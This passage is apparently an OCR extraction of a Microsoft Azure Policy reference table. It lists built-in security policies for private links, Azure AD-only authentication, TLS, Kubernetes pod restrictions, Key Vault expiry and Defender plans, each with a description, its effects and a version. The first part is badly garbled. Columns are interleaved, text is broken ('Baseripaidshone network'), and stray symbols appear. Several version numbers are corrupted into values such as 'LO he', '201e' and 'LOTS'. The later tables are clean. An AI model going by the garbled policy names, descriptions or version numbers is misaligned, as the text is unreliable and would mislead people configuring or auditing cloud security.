your workspaces by creating private endpoints instead. Learn 


more at: https://learn.microsoft.com/azure/machine- 
learning/how-to-configure-private-link?view=azureml-api- 
2&tabs=azure-portal. 


Azure Private Link lets you connect your virtual network to 
Azure services without a public IP address at the source or 
destination. The Private Link platform handles the 
connectivity between the consumer and services over the 


Effect(s) 


Audit, Disabled 


[parameters(‘effects')] 


Audit, Disabled 


Audit, Deny, Disabled 


Audit, Deny, Disabled 


Audit, Deny, Disabled 


Audit, Disabled 


Version 


(GitHub) 


201e 


1:0.3:2 


LO he 


2016 


1.03¢ 


20.12 


1.0.02 


Policy name 


(Azure portal) 


Azure MySQL flexible 
server should have 
Azure Active Directory 
Only Authentication 
enabled 7 


Azure Policy Add-on 
for Kubernetes service 
(AKS) should be 
installed and enabled 
on your clusters 7 


Azure Role-Based 
Access Control (RBAC) 
should be used on 
Kubernetes Services E 


Azure SignalR Service 
should use private 
link Z 


Azure Spring Cloud 
should use network 
injection 2 


Azure SQL Database 
should be running 
TLS version 1.2 or 
newer E 


Azure SQL Database 
should have Azure 
Active Directory Only 
Authentication 
enabled 7 


Azure SQL Managed 
Instance should have 
Azure Active Directory 
Only Authentication 
enabled Z 


Azure SQL Managed 
Instances should 


Baseripaidshone network. By mapping private endpoints to Version 
Azure Machine Learning workspaces, data leakage risks are 
reduced. Learn more about private links at: 
https://docs.microsoft.com/azure/machine-learning/how-to- 


configure-private-link. 


Effect(s) 


(GitHub) 


Disabling local authentication methods and allowing only AuditlfNotExists, Disabled 1.0.0 7 
Azure Active Directory Authentication improves security by 
ensuring that Azure MySQL flexible server can exclusively be 


accessed by Azure Active Directory identities. 


Azure Policy Add-on for Kubernetes service (AKS) extends 1.0.2¢ 
Gatekeeper v3, an admission controller webhook for Open 


Policy Agent (OPA), to apply at-scale enforcements and 


Audit, Disabled 


safeguards on your clusters in a centralized, consistent 
manner. 


To provide granular filtering on the actions that users can Audit, Disabled 1.03¢ 
perform, use Azure Role-Based Access Control (RBAC) to 
manage permissions in Kubernetes Service Clusters and 


configure relevant authorization policies. 


Azure Private Link lets you connect your virtual network to Audit, Disabled 1.0.02 
Azure services without a public IP address at the source or 

destination. The private link platform handles the 

connectivity between the consumer and services over the 

Azure backbone network. By mapping private endpoints to 

your Azure SignalR Service resource instead of the entire 

service, you'll reduce your data leakage risks. Learn more 


about private links at: https://aka.ms/asrs/privatelink £Z . 


Azure Spring Cloud instances should use virtual network Audit, Disabled, Deny 1.2.0¢ 
injection for the following purposes: 1. Isolate Azure Spring 

Cloud from Internet. 2. Enable Azure Spring Cloud to interact 

with systems in either on premises data centers or Azure 

service in other virtual networks. 3. Empower customers to 

control inbound and outbound network communications for 


Azure Spring Cloud. 


Setting TLS version to 1.2 or newer improves security by 2.0.0 Z 
ensuring your Azure SQL Database can only be accessed 

from clients using TLS 1.2 or newer. Using versions of TLS 

less than 1.2 is not recommended since they have well 


documented security vulnerabilities. 


Audit, Disabled, Deny 


Disabling local authentication methods and allowing only Audit, Deny, Disabled 1.0.0¢ 
Azure Active Directory Authentication improves security by 

ensuring that Azure SQL Databases can exclusively be 

accessed by Azure Active Directory identities. Learn more at: 


aka.ms/adonlycreate. 


Disabling local authentication methods and allowing only Audit, Deny, Disabled 1.0.0¢ 
Azure Active Directory Authentication improves security by 

ensuring that Azure SQL Managed Instances can exclusively 

be accessed by Azure Active Directory identities. Learn more 


at: aka.ms/adonlycreate. 


Disabling public network access (public endpoint) on Azure Audit, Deny, Disabled 1.0.02 


SQL Managed Instances improves security by ensuring that 


Policy name 


(Azure portal) 


disable public 
network access E 


Azure Web 
Application Firewall 
should be enabled for 
Azure Front Door 
entry-points E 


Blocked accounts with 
owner permissions on 
Azure resources 

should be removed 7 


Blocked accounts with 
read and write 
permissions on Azure 
resources should be 
removed č 


Cognitive Services 
accounts should 
disable public 
network access E 


Cognitive Services 
accounts should 
enable data 
encryption with a 
customer-managed 
key E 


Cognitive Services 
accounts should have 
local authentication 
methods disabled # 


Cognitive Services 
accounts should 
restrict network 
access E 


Cognitive Services 
should use private 


Description 


they can only be accessed from inside their virtual networks 
or via Private Endpoints. To learn more about public network 
access, visit https://aka.ms/mi-public-endpoint £ . 


Deploy Azure Web Application Firewall (WAF) in front of 
public facing web applications for additional inspection of 
incoming traffic. Web Application Firewall (WAF) provides 
centralized protection of your web applications from 
common exploits and vulnerabilities such as SQL injections, 
Cross-Site Scripting, local and remote file executions. You can 
also restrict access to your web applications by countries, IP 
address ranges, and other http(s) parameters via custom 
rules. 


Deprecated accounts with owner permissions should be 
removed from your subscription. Deprecated accounts are 
accounts that have been blocked from signing in. 


Deprecated accounts should be removed from your 
subscriptions. Deprecated accounts are accounts that have 
been blocked from signing in. 


To improve the security of Cognitive Services accounts, 
ensure that it isn't exposed to the public internet and can 
only be accessed from a private endpoint. Disable the public 
network access property as described in 
https://go.microsoft.com/fwlink/?linkid=2 129800 £ . This 
option disables access from any public address space outside 
the Azure IP range, and denies all logins that match IP or 
virtual network-based firewall rules. This reduces data 
leakage risks. 


Customer-managed keys are commonly required to meet 
regulatory compliance standards. Customer-managed keys 
enable the data stored in Cognitive Services to be encrypted 
with an Azure Key Vault key created and owned by you. You 
have full control and responsibility for the key lifecycle, 
including rotation and management. Learn more about 
customer-managed keys at https://go.microsoft.com/fwlink/? 
linkid=2121321 Z. 


Disabling local authentication methods improves security by 
ensuring that Cognitive Services accounts require Azure 
Active Directory identities exclusively for authentication. 
Learn more at: https://aka.ms/cs/auth £ . 


Network access to Cognitive Services accounts should be 
restricted. Configure network rules so only applications from 
allowed networks can access the Cognitive Services account. 
To allow connections from specific internet or on-premises 
clients, access can be granted to traffic from specific Azure 
virtual networks or to public internet IP address ranges. 


Azure Private Link lets you connect your virtual networks to 
Azure services without a public IP address at the source or 


Effect(s) 


Audit, Deny, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


Audit, Deny, Disabled 


Audit, Deny, Disabled 


Audit, Deny, Disabled 


Audit, Deny, Disabled 


Audit, Disabled 


Version 


(GitHub) 


1.0.24 


1.0.07 


1.0.0 4 


3.0.1 2 


2.1.04 


1.0.0 2 


3.0.0 7 


3.0.0 2 


Policy name 
(Azure portal) 


link Z 


Container registries 
should be encrypted 
with a customer- 
managed key Si 


Container registries 
should not allow 
unrestricted network 
access E 


Container registries 
should use private 
link 2 


Container registry 
images should have 
vulnerability findings 
resolved 7 


Container registry 
images should have 
vulnerability findings 
resolved (powered by 
Microsoft Defender 
Vulnerability 
Management) Z 


Cosmos DB database 
accounts should have 
local authentication 
methods disabled tz 


Description Effect(s) 


destination. The Private Link platform handles the 
connectivity between the consumer and services over the 
Azure backbone network. By mapping private endpoints to 
Cognitive Services, you'll reduce the potential for data 
leakage. Learn more about private links at: 
https://go.microsoft.com/fwlink/?linkid=2129800 Z . 


Use customer-managed keys to manage the encryption at Audit, Deny, Disabled 
rest of the contents of your registries. By default, the data is 

encrypted at rest with service-managed keys, but customer- 

managed keys are commonly required to meet regulatory 

compliance standards. Customer-managed keys enable the 

data to be encrypted with an Azure Key Vault key created 

and owned by you. You have full control and responsibility 

for the key lifecycle, including rotation and management. 

Learn more at https://aka.ms/acr/CMK Z. 


Azure container registries by default accept connections over Audit, Deny, Disabled 
the internet from hosts on any network. To protect your 

registries from potential threats, allow access from only 

specific private endpoints, public IP addresses or address 

ranges. If your registry doesn't have network rules 

configured, it will appear in the unhealthy resources. Learn 

more about Container Registry network rules here: 

https://aka.ms/acr/privatelink, 7 

https://aka.ms/acr/portal/public-network £ and 

https://aka.ms/acr/vnet Z . 


Azure Private Link lets you connect your virtual network to Audit, Disabled 
Azure services without a public IP address at the source or 

destination. The private link platform handles the 

connectivity between the consumer and services over the 

Azure backbone network.By mapping private endpoints to 

your container registries instead of the entire service, you'll 

also be protected against data leakage risks. Learn more at: 
https://aka.ms/acr/private-link Z . 


Container image vulnerability assessment scans your registry AuditlfNotExists, Disabled 
for security vulnerabilities and exposes detailed findings for 

each image. Resolving the vulnerabilities can greatly improve 

your containers’ security posture and protect them from 

attacks. 


Container image vulnerability assessment scans your registry AuditlfNotExists, Disabled 
for commonly known vulnerabilities (CVEs) and provides a 

detailed vulnerability report for each image. Resolving 

vulnerabilities can greatly improve your security posture, 

ensuring images are safe to use prior to deployment. 


Disabling local authentication methods improves security by Audit, Deny, Disabled 
ensuring that Cosmos DB database accounts exclusively 

require Azure Active Directory identities for authentication. 

Learn more at: https://docs.microsoft.com/azure/cosmos- 
db/how-to-setup-rbac#disable-local-auth. 


Version 


(GitHub) 


(bb 


2.0.0 2 


1.0.1 2 


201 


1.0.07 


1.1.0¢ 


Policy name 


(Azure portal) 


CosmosDB accounts 
should use private 
link 2 


Email notification for 
high severity alerts 
should be enabled € 


Email notification to 
subscription owner 
for high severity alerts 
should be enabled Z 


Endpoint protection 
health issues should 
be resolved on your 
machines Z 


Endpoint protection 
should be installed on 
your machines 6 


Endpoint protection 
solution should be 
installed on virtual 
machine scale sets 7 


Enforce SSL 
connection should be 
enabled for MySQL 
database servers E 


Enforce SSL 
connection should be 
enabled for 
PostgreSQL database 
servers E 


Description 


Azure Private Link lets you connect your virtual network to 
Azure services without a public IP address at the source or 
destination. The Private Link platform handles the 
connectivity between the consumer and services over the 
Azure backbone network. By mapping private endpoints to 
your CosmosDB account, data leakage risks are reduced. 
Learn more about private links at: 
https://docs.microsoft.com/azure/cosmos-db/how-to- 
configure-private-endpoints. 


To ensure the relevant people in your organization are 
notified when there is a potential security breach in one of 
your subscriptions, enable email notifications for high 
severity alerts in Security Center. 


To ensure your subscription owners are notified when there 
is a potential security breach in their subscription, set email 


notifications to subscription owners for high severity alerts in 


Security Center. 


Resolve endpoint protection health issues on your virtual 
machines to protect them from latest threats and 
vulnerabilities. Azure Security Center supported endpoint 
protection solutions are documented here - 
https://docs.microsoft.com/azure/security-center/security- 
center-services?tabs=features-windows#supported- 
endpoint-protection-solutions. Endpoint protection 
assessment is documented here - 
https://docs.microsoft.com/azure/security-center/security- 
center-endpoint-protection. 


To protect your machines from threats and vulnerabilities, 
install a supported endpoint protection solution. 


Audit the existence and health of an endpoint protection 
solution on your virtual machines scale sets, to protect them 
from threats and vulnerabilities. 


Azure Database for MySQL supports connecting your Azure 
Database for MySQL server to client applications using 
Secure Sockets Layer (SSL). Enforcing SSL connections 
between your database server and your client applications 
helps protect against 'man in the middle’ attacks by 
encrypting the data stream between the server and your 
application. This configuration enforces that SSL is always 
enabled for accessing your database server. 


Azure Database for PostgreSQL supports connecting your 
Azure Database for PostgreSQL server to client applications 
using Secure Sockets Layer (SSL). Enforcing SSL connections 
between your database server and your client applications 
helps protect against 'man in the middle’ attacks by 
encrypting the data stream between the server and your 
application. This configuration enforces that SSL is always 
enabled for accessing your database server. 


Effect(s) 


Audit, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


Audit, Disabled 


Audit, Disabled 


Version 


(GitHub) 


1.0.0 4 


10.1 


2.0.0 Z 


1.0.0 4 


1.0.0 2 


3.0.0 Z 


1.0.1¢ 


10.17 


Policy name 


(Azure portal) 


Function apps should 
have ‘Client 
Certificates (Incoming 
client certificates)’ 
enabled Z 


Function apps should 
have remote 
debugging turned off Z 


Function apps should 
not have CORS 
configured to allow 
every resource to 
access your apps 4 


Function apps should 
only be accessible 
over HTTPS Z 


Function apps should 
require FTPS only Z 


Function apps should 
use managed identity E 


Function apps should 
use the latest TLS 
version č 


Geo-redundant 

backup should be 
enabled for Azure 
Database for MariaDB Z 


Geo-redundant 
backup should be 
enabled for Azure 
Database for MySQL Z 


Geo-redundant 
backup should be 
enabled for Azure 
Database for 
PostgreSQL E 


Guest accounts with 
owner permissions on 


Description 


Client certificates allow for the app to request a certificate for 
incoming requests. Only clients with valid certificates will be 
able to reach the app. 


Remote debugging requires inbound ports to be opened on 
Function apps. Remote debugging should be turned off. 


Cross-Origin Resource Sharing (CORS) should not allow all 
domains to access your Function app. Allow only required 
domains to interact with your Function app. 


Use of HTTPS ensures server/service authentication and 
protects data in transit from network layer eavesdropping 
attacks. 


Enable FTPS enforcement for enhanced security. 


Use a managed identity for enhanced authentication security 


Periodically, newer versions are released for TLS either due to 
security flaws, include additional functionality, and enhance 
speed. Upgrade to the latest TLS version for Function apps to 
take advantage of security fixes, if any, and/or new 
functionalities of the latest version. 


Azure Database for MariaDB allows you to choose the 
redundancy option for your database server. It can be set to 
a geo-redundant backup storage in which the data is not 
only stored within the region in which your server is hosted, 
but is also replicated to a paired region to provide recovery 
option in case of a region failure. Configuring geo-redundant 
storage for backup is only allowed during server create. 


Azure Database for MySQL allows you to choose the 
redundancy option for your database server. It can be set to 
a geo-redundant backup storage in which the data is not 
only stored within the region in which your server is hosted, 
but is also replicated to a paired region to provide recovery 
option in case of a region failure. Configuring geo-redundant 
storage for backup is only allowed during server create. 


Azure Database for PostgreSQL allows you to choose the 
redundancy option for your database server. It can be set to 
a geo-redundant backup storage in which the data is not 
only stored within the region in which your server is hosted, 
but is also replicated to a paired region to provide recovery 
option in case of a region failure. Configuring geo-redundant 
storage for backup is only allowed during server create. 


External accounts with owner permissions should be 
removed from your subscription in order to prevent 


Effect(s) Version 


(GitHub) 


Audit, Disabled 3.0.0 Z 


AuditlfNotExists, Disabled 2.0.0 Z 


AuditlfNotExists, Disabled 2.0.0 Z 


Audit, Disabled, Deny 5.0.0 Z 


AuditlfNotExists, Disabled 3.0.0 Z 


AuditlfNotExists, Disabled 3.0.0 Z 


AuditlfNotExists, Disabled 2.0.1 Z 


Audit, Disabled 1.0.1 
Audit, Disabled 1.0.1 
Audit, Disabled 1.0.1 4 


AuditlfNotExists, Disabled 1.0.07 


Policy name 


(Azure portal) 


Azure resources 
should be removed Z 


Guest accounts with 
read permissions on 
Azure resources 
should be removed 7 


Guest accounts with 
write permissions on 
Azure resources 
should be removed 7 


Guest Configuration 
extension should be 
installed on your 
machines E 


Internet-facing virtual 
machines should be 
protected with 
network security 
groups E 


IP Forwarding on your 
virtual machine 
should be disabled 7 


Key Vault keys should 
have an expiration 
date 7 


Key Vault secrets 
should have an 
expiration date 7 


Key vaults should 
have deletion 
protection enabled ¢ 


Key vaults should 
have soft delete 


Description Effect(s) Version 


(GitHub) 


unmonitored access. 


External accounts with read privileges should be removed AuditlfNotExists, Disabled 1.0.0 7 
from your subscription in order to prevent unmonitored 


access. 


External accounts with write privileges should be removed AuditlfNotExists, Disabled 1.0.07 
from your subscription in order to prevent unmonitored 


access. 


To ensure secure configurations of in-guest settings of your AuditlfNotExists, Disabled 1.0.37 
machine, install the Guest Configuration extension. In-guest 

settings that the extension monitors include the 

configuration of the operating system, application 

configuration or presence, and environment settings. Once 

installed, in-guest policies will be available such as 'Windows 

Exploit guard should be enabled’. Learn more at 


https://aka.ms/gcpol £ . 


Protect your virtual machines from potential threats by AuditlfNotExists, Disabled 3.0.0 
restricting access to them with network security groups 
(NSG). Learn more about controlling traffic with NSGs at 


https://aka.ms/nsg-doc E 


Enabling IP forwarding on a virtual machine's NIC allows the 3.0.0 £ 


machine to receive traffic addressed to other destinations. IP 


AuditlfNotExists, Disabled 


forwarding is rarely required (e.g., when using the VM as a 
network virtual appliance), and therefore, this should be 
reviewed by the network security team. 


Cryptographic keys should have a defined expiration date 10.22 


and not be permanent. Keys that are valid forever provide a 


Audit, Deny, Disabled 


potential attacker with more time to compromise the key. It 
is a recommended security practice to set expiration dates 
on cryptographic keys. 

Secrets should have a defined expiration date and not be Audit, Deny, Disabled 10.2 2 
permanent. Secrets that are valid forever provide a potential 

attacker with more time to compromise them. It is a 

recommended security practice to set expiration dates on 


secrets. 


Malicious deletion of a key vault can lead to permanent data Audit, Deny, Disabled 2.1.0% 
loss. You can prevent permanent data loss by enabling purge 

protection and soft delete. Purge protection protects you 

from insider attacks by enforcing a mandatory retention 

period for soft deleted key vaults. No one inside your 

organization or Microsoft will be able to purge your key 

vaults during the soft delete retention period. Keep in mind 

that key vaults created after September 1st 2019 have soft- 


delete enabled by default. 


Deleting a key vault without soft delete enabled permanently 3.0.0 4 


deletes all secrets, keys, and certificates stored in the key 


Audit, Deny, Disabled 


Policy name 
(Azure portal) 


enabled zZ 


Kubernetes cluster 
containers CPU and 
memory resource 
limits should not 
exceed the specified 
limits £ 


Kubernetes cluster 
containers should not 
share host process ID 
or host IPC 
namespace & 


Kubernetes cluster 
containers should 
only use allowed 
AppArmor profiles E 


Kubernetes cluster 
containers should 
only use allowed 
capabilities E 


Kubernetes cluster 
containers should 
only use allowed 
images E 


Kubernetes cluster 
containers should run 
with a read only root 
file system Z 


Kubernetes cluster 
pod hostPath volumes 
should only use 
allowed host paths E 


Kubernetes cluster 
pods and containers 
should only run with 


Description 


vault. Accidental deletion of a key vault can lead to 
permanent data loss. Soft delete allows you to recover an 
accidentally deleted key vault for a configurable retention 
period. 


Enforce container CPU and memory resource limits to 
prevent resource exhaustion attacks in a Kubernetes cluster. 
This policy is generally available for Kubernetes Service (AKS), 
and preview for Azure Arc enabled Kubernetes. For more 
information, see https://aka.ms/kubepolicydoc £ . 


Block pod containers from sharing the host process ID 
namespace and host IPC namespace in a Kubernetes cluster. 
This recommendation is part of CIS 5.2.2 and CIS 5.2.3 which 
are intended to improve the security of your Kubernetes 
environments. This policy is generally available for 
Kubernetes Service (AKS), and preview for Azure Arc enabled 
Kubernetes. For more information, see 
https://aka.ms/kubepolicydoc £ . 


Containers should only use allowed AppArmor profiles in a 
Kubernetes cluster. This policy is generally available for 
Kubernetes Service (AKS), and preview for Azure Arc enabled 
Kubernetes. For more information, see 
https://aka.ms/kubepolicydoc £ . 


Restrict the capabilities to reduce the attack surface of 
containers in a Kubernetes cluster. This recommendation is 
part of CIS 5.2.8 and CIS 5.2.9 which are intended to improve 
the security of your Kubernetes environments. This policy is 
generally available for Kubernetes Service (AKS), and preview 
for Azure Arc enabled Kubernetes. For more information, see 
https://aka.ms/kubepolicydoc £ . 


Use images from trusted registries to reduce the Kubernetes 
cluster's exposure risk to unknown vulnerabilities, security 
issues and malicious images. This policy is generally available 
for Kubernetes Service (AKS), and preview for Azure Arc 
enabled Kubernetes. For more information, see 
https://aka.ms/kubepolicydoc £ . 


Run containers with a read only root file system to protect 
from changes at run-time with malicious binaries being 
added to PATH in a Kubernetes cluster. This policy is 
generally available for Kubernetes Service (AKS), and preview 
for Azure Arc enabled Kubernetes. For more information, see 
https://aka.ms/kubepolicydoc £ . 


Limit pod HostPath volume mounts to the allowed host 
paths in a Kubernetes Cluster. This policy is generally 
available for Kubernetes Service (AKS), and Azure Arc 
enabled Kubernetes. For more information, see 
https://aka.ms/kubepolicydoc £ . 


Control the user, primary group, supplemental group and file 
system group IDs that pods and containers can use to run in 
a Kubernetes Cluster. This policy is generally available for 


Effect(s) 


audit, Audit, deny, Deny, 
disabled, Disabled 


audit, Audit, deny, Deny, 
disabled, Disabled 


audit, Audit, deny, Deny, 
disabled, Disabled 


audit, Audit, deny, Deny, 
disabled, Disabled 


audit, Audit, deny, Deny, 
disabled, Disabled 


audit, Audit, deny, Deny, 
disabled, Disabled 


audit, Audit, deny, Deny, 
disabled, Disabled 


audit, Audit, deny, Deny, 
disabled, Disabled 


Version 


(GitHub) 


9.1.02 


5.1.07 


6.1.12 


6.1.07 


9.107 


6.1.07 


6.1.12 


6.1.12 


Policy name 
(Azure portal) 


approved user and 
group IDs £ 


Kubernetes cluster 
pods should only use 
approved host 
network and port 
range č 


Kubernetes cluster 
services should listen 
only on allowed ports E 


Kubernetes cluster 
should not allow 
privileged containers E 


Kubernetes clusters 
should be accessible 
only over HTTPS Z 


Kubernetes clusters 
should disable 
automounting API 
credentials 7 


Kubernetes clusters 
should not allow 
container privilege 
escalation 7 


Kubernetes clusters 
should not grant 
CAP_SYS_ADMIN 
security capabilities 7 


Kubernetes clusters 
should not use the 
default namespace 2 


Linux machines 
should have Log 


Description 


Kubernetes Service (AKS), and preview for Azure Arc enabled 


Kubernetes. For more information, see 
https://aka.ms/kubepolicydoc £ . 


Restrict pod access to the host network and the allowable 
host port range in a Kubernetes cluster. This 
recommendation is part of CIS 5.2.4 which is intended to 


improve the security of your Kubernetes environments. This 
policy is generally available for Kubernetes Service (AKS), and 


preview for Azure Arc enabled Kubernetes. For more 
information, see https://aka.ms/kubepolicydoc £ . 


Restrict services to listen only on allowed ports to secure 
access to the Kubernetes cluster. This policy is generally 


available for Kubernetes Service (AKS), and preview for Azure 


Arc enabled Kubernetes. For more information, see 
https://aka.ms/kubepolicydoc £ . 


Do not allow privileged containers creation in a Kubernetes 
cluster. This recommendation is part of CIS 5.2.1 which is 
intended to improve the security of your Kubernetes 
environments. This policy is generally available for 


Kubernetes Service (AKS), and preview for Azure Arc enabled 


Kubernetes. For more information, see 
https://aka.ms/kubepolicydoc £ . 


Use of HTTPS ensures authentication and protects data in 
transit from network layer eavesdropping attacks. This 
capability is currently generally available for Kubernetes 
Service (AKS), and in preview for Azure Arc enabled 


Kubernetes. For more info, visit https://aka.ms/kubepolicydoc ¢ 


Disable automounting API credentials to prevent a 


potentially compromised Pod resource to run API commands 


against Kubernetes clusters. For more information, see 
https://aka.ms/kubepolicydoc £ . 


Do not allow containers to run with privilege escalation to 


root in a Kubernetes cluster. This recommendation is part of 


CIS 5.2.5 which is intended to improve the security of your 
Kubernetes environments. This policy is generally available 
for Kubernetes Service (AKS), and preview for Azure Arc 
enabled Kubernetes. For more information, see 
https://aka.ms/kubepolicydoc £ . 


To reduce the attack surface of your containers, restrict 
CAP_SYS_ADMIN Linux capabilities. For more information, 
see https://aka.ms/kubepolicydoc Z . 


Prevent usage of the default namespace in Kubernetes 
clusters to protect against unauthorized access for 
ConfigMap, Pod, Secret, Service, and ServiceAccount 
resource types. For more information, see 
https://aka.ms/kubepolicydoc Z . 


Machines are non-compliant if Log Analytics agent is not 
installed on Azure Arc enabled Linux server. 


Effect(s) 


audit, Audit, deny, Deny, 
disabled, Disabled 


audit, Audit, deny, Deny, 
disabled, Disabled 


audit, Audit, deny, Deny, 
disabled, Disabled 


audit, Audit, deny, Deny, 
disabled, Disabled 


audit, Audit, deny, Deny, 
disabled, Disabled 


audit, Audit, deny, Deny, 


disabled, Disabled 


audit, Audit, deny, Deny, 


disabled, Disabled 


audit, Audit, deny, Deny, 
disabled, Disabled 


AuditlfNotExists, Disabled 


Version 


(GitHub) 


6.1.04 


8.1.07 


9.1.06 


8.1.07 


4.1.0 2 


ZIO 


5.102 


410% 


1.1.0¢ 


Policy name 
(Azure portal) 


Analytics agent 


installed on Azure Arc? 


Linux machines 
should meet 
requirements for the 
Azure compute 
security baseline Z 


Log Analytics agent 
should be installed on 
your virtual machine 
for Azure Security 
Center monitoring E 


Log Analytics agent 
should be installed on 
your virtual machine 
scale sets for Azure 
Security Center 
monitoring E 


Machines should be 
configured to 
periodically check for 
missing system 
updates 7 


Machines should have 
secret findings 
resolved 7 


Management ports of 
virtual machines 
should be protected 
with just-in-time 
network access 
control 7 


| Policy name (Azure portal) | Description | Effect(s) | Version (GitHub) |
|---|---|---|---|
| | Requires that prerequisites are deployed to the policy assignment scope. For details, visit https://aka.ms/gcpol. Machines are non-compliant if the machine is not configured correctly for one of the recommendations in the Azure compute security baseline. | AuditIfNotExists, Disabled | 2.1.0 |
| | This policy audits any Windows/Linux virtual machines (VMs) on which the Log Analytics agent, which Security Center uses to monitor for security vulnerabilities and threats, is not installed. | AuditIfNotExists, Disabled | 1.0.0 |
| | Security Center collects data from your Azure virtual machines (VMs) to monitor for security vulnerabilities and threats. | AuditIfNotExists, Disabled | 1.0.0 |
| | To ensure that periodic assessments for missing system updates are triggered automatically every 24 hours, the AssessmentMode property should be set to 'AutomaticByPlatform'. Learn more about the AssessmentMode property for Windows at https://aka.ms/computevm-windowspatchassessmentmode and for Linux at https://aka.ms/computevm-linuxpatchassessmentmode. | Audit, Deny, Disabled | 3.4.1 |
| | Audits virtual machines to detect whether they contain secret findings from the secret scanning solutions on your virtual machines. | AuditIfNotExists, Disabled | 1.0.2 |
| | Possible network Just In Time (JIT) access will be monitored by Azure Security Center as recommendations. | AuditIfNotExists, Disabled | 3.0.0 |
| Management ports should be closed on your virtual machines | Open remote management ports expose your VM to a high level of risk from Internet-based attacks. These attacks attempt to brute force credentials to gain admin access to the machine. | AuditIfNotExists, Disabled | 3.0.0 |
| Microsoft Defender CSPM should be enabled | Defender Cloud Security Posture Management (CSPM) provides enhanced posture capabilities and a new intelligent cloud security graph to help identify, prioritize, and reduce risk. Defender CSPM is available in addition to the free foundational security posture capabilities turned on by default in Defender for Cloud. | AuditIfNotExists, Disabled | 1.0.0 |
| Microsoft Defender for Containers should be enabled | Microsoft Defender for Containers provides hardening, vulnerability assessment and run-time protections for your Azure, hybrid, and multi-cloud Kubernetes environments. | AuditIfNotExists, Disabled | 1.0.0 |

| Policy name (Azure portal) | Description | Effect(s) | Version (GitHub) |
|---|---|---|---|
| Microsoft Defender for SQL status should be protected for Arc-enabled SQL Servers | Microsoft Defender for SQL provides functionality for surfacing and mitigating potential database vulnerabilities, detecting anomalous activities that could indicate threats to SQL databases, and discovering and classifying sensitive data. Once enabled, the protection status indicates that the resource is actively monitored. Even when Defender is enabled, multiple configuration settings should be validated on the agent, machine, workspace and SQL server to ensure active protection. | Audit, Disabled | LOTS |
| Microsoft Defender for Storage (Classic) should be enabled | Microsoft Defender for Storage (Classic) provides detections of unusual and potentially harmful attempts to access or exploit storage accounts. | AuditIfNotExists, Disabled | 1.0.4 |
| Microsoft Defender for Storage should be enabled | Microsoft Defender for Storage detects potential threats to your storage accounts. It helps prevent the three major impacts on your data and workload: malicious file uploads, sensitive data exfiltration, and data corruption. The new Defender for Storage plan includes Malware Scanning and Sensitive Data Threat Detection. This plan also provides a predictable pricing structure (per storage account) for control over coverage and costs. | AuditIfNotExists, Disabled | 1.0.0 |
| Monitor missing Endpoint Protection in Azure Security Center | Servers without an installed Endpoint Protection agent will be monitored by Azure Security Center as recommendations. | AuditIfNotExists, Disabled | 3.0.0 |
| MySQL servers should use customer-managed keys to encrypt data at rest | Use customer-managed keys to manage the encryption at rest of your MySQL servers. By default, the data is encrypted at rest with service-managed keys, but customer-managed keys are commonly required to meet regulatory compliance standards. Customer-managed keys enable the data to be encrypted with an Azure Key Vault key created and owned by you. You have full control and responsibility for the key lifecycle, including rotation and management. | AuditIfNotExists, Disabled | 1.0.4 |
| Network Watcher should be enabled | Network Watcher is a regional service that enables you to monitor and diagnose conditions at a network scenario level in, to, and from Azure. Scenario-level monitoring enables you to diagnose problems with an end-to-end view of the network. A network watcher resource group must be created in every region where a virtual network is present. An alert is enabled if a network watcher resource group is not available in a particular region. | AuditIfNotExists, Disabled | 3.0.0 |
| Non-internet-facing virtual machines should be protected with network security groups | Protect your non-internet-facing virtual machines from potential threats by restricting access with network security groups (NSG). Learn more about controlling traffic with NSGs at https://aka.ms/nsg-doc. | AuditIfNotExists, Disabled | 3.0.0 |
| Only secure connections to your Azure Cache for Redis should be enabled | Audit enabling of only connections via SSL to Azure Cache for Redis. Use of secure connections ensures authentication between the server and the service and protects data in transit from network layer attacks such as man-in-the-middle, eavesdropping, and session hijacking. | Audit, Deny, Disabled | 1.0.0 |

| Policy name (Azure portal) | Description | Effect(s) | Version (GitHub) |
|---|---|---|---|
| PostgreSQL servers should use customer-managed keys to encrypt data at rest | Use customer-managed keys to manage the encryption at rest of your PostgreSQL servers. By default, the data is encrypted at rest with service-managed keys, but customer-managed keys are commonly required to meet regulatory compliance standards. Customer-managed keys enable the data to be encrypted with an Azure Key Vault key created and owned by you. You have full control and responsibility for the key lifecycle, including rotation and management. | AuditIfNotExists, Disabled | 1.0.4 |
| Private endpoint connections on Azure SQL Database should be enabled | Private endpoint connections enforce secure communication by enabling private connectivity to Azure SQL Database. | Audit, Disabled | 1.1.0 |
| Private endpoint should be enabled for MariaDB servers | Private endpoint connections enforce secure communication by enabling private connectivity to Azure Database for MariaDB. Configure a private endpoint connection to enable access to traffic coming only from known networks and prevent access from all other IP addresses, including within Azure. | AuditIfNotExists, Disabled | 1.0.2 |
| Private endpoint should be enabled for MySQL servers | Private endpoint connections enforce secure communication by enabling private connectivity to Azure Database for MySQL. Configure a private endpoint connection to enable access to traffic coming only from known networks and prevent access from all other IP addresses, including within Azure. | AuditIfNotExists, Disabled | 1.0.2 |
| Private endpoint should be enabled for PostgreSQL servers | Private endpoint connections enforce secure communication by enabling private connectivity to Azure Database for PostgreSQL. Configure a private endpoint connection to enable access to traffic coming only from known networks and prevent access from all other IP addresses, including within Azure. | AuditIfNotExists, Disabled | 1.0.2 |
| Public network access on Azure SQL Database should be disabled | Disabling the public network access property improves security by ensuring your Azure SQL Database can only be accessed from a private endpoint. This configuration denies all logins that match IP or virtual network based firewall rules. | Audit, Deny, Disabled | 1.1.0 |
| Public network access should be disabled for MariaDB servers | Disable the public network access property to improve security and ensure your Azure Database for MariaDB can only be accessed from a private endpoint. This configuration strictly disables access from any public address space outside of the Azure IP range, and denies all logins that match IP or virtual network-based firewall rules. | Audit, Deny, Disabled | 2.0.0 |
| Public network access should be disabled for MySQL servers | Disable the public network access property to improve security and ensure your Azure Database for MySQL can only be accessed from a private endpoint. This configuration strictly disables access from any public address space outside of the Azure IP range, and denies all logins that match IP or virtual network-based firewall rules. | Audit, Deny, Disabled | 2.0.0 |
| Public network access should be disabled for PostgreSQL servers | Disable the public network access property to improve security and ensure your Azure Database for PostgreSQL can only be accessed from a private endpoint. This configuration strictly disables access from any public address space outside of the Azure IP range, and denies all logins that match IP or virtual network-based firewall rules. | Audit, Deny, Disabled | 2.0.1 |
